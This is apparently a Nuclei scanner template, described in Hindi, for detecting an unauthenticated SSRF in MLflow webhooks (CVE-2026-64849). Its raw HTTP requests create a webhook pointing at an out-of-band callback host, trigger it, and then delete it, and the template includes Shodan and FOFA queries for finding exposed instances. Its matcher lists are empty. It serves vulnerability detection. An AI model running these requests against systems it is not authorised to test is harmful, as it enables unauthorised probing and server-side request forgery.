
अनधिकृत MLflow वेबहुक SSRF (CVE-2026-64849) का पता लगाता है जो आंतरिक या क्लाउड मेटाडेटा सेवाओं तक पहुँचता है और रीडायरेक्ट बायपास के माध्यम से प्रतिक्रिया विवरण लीक करता है।
id: CVE-2026-64849
info: name: MLflow वेबहुक SSRF - रीडायरेक्ट बायपास के माध्यम से बिना प्रमाणीकरण के पूर्ण-पठन author: DhiyaneshDk severity: critical description: | MLflow > 3.15.0 में वेबहुक URL के अनुचित सत्यापन के कारण एक सूचना प्रकटीकरण भेद्यता मौजूद है, जो हमलावरों को आंतरिक या क्लाउड मेटाडेटा सेवाओं तक पहुँचने और प्रतिक्रिया विवरण प्राप्त करने की अनुमति देती है; शोषण के लिए वेबहुक परीक्षण एंडपॉइंट तक बिना प्रमाणीकरण के पहुँच आवश्यक है। impact: | हमलावर आंतरिक या क्लाउड मेटाडेटा सेवाओं तक पहुँच सकते हैं और प्रतिक्रिया स्थिति तथा बॉडी प्राप्त कर सकते हैं, जिससे संभावित रूप से संवेदनशील जानकारी उजागर हो सकती है। remediation: | MLflow को PR #24258 युक्त संस्करण में अपग्रेड करें, जो रीडायरेक्ट लक्ष्यों और DNS रीबाइंडिंग को कवर करते हुए कनेक्शन-समय IP सत्यापन के लिए SSRFProtectedHTTPAdapter जोड़ता है। reference: - https://github.com/mlflow/mlflow/security/advisories/GHSA-7gwp-5pfp-969j - https://github.com/mlflow/mlflow/pull/24258 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N cvss-score: 9.3 cve-id: CVE-2026-64849 epss-score: 0.00349 epss-percentile: 0.27929 cwe-id: CWE-918 metadata: max-request: 3 verified: true shodan-query: http.title:"MLflow" fofa-query: title="MLflow" tags: cve,cve2026,mlflow,ssrf,oast,webhook,oss,vkev
variables: random: "{{rand_text_alpha(8)}}"
http:
raw:
| POST /api/2.0/mlflow/webhooks HTTP/1.1 Host: {{Hostname}} Content-Type: application/json
{"name":"{{random}}","url":"https://{{interactsh-url}}","events":[{"entity":"REGISTERED_MODEL","action":"CREATED"}]}
| POST /api/2.0/mlflow/webhooks/{{webhook_id}}/test HTTP/1.1 Host: {{Hostname}} Content-Type: application/json
{"webhook_id":"{{webhook_id}}","event":{"entity":"REGISTERED_MODEL","action":"CREATED"}}
| DELETE /api/2.0/mlflow/webhooks/{{webhook_id}} HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers:
type: word part: body_1 words:
type: word part: interactsh_protocol words:
extractors: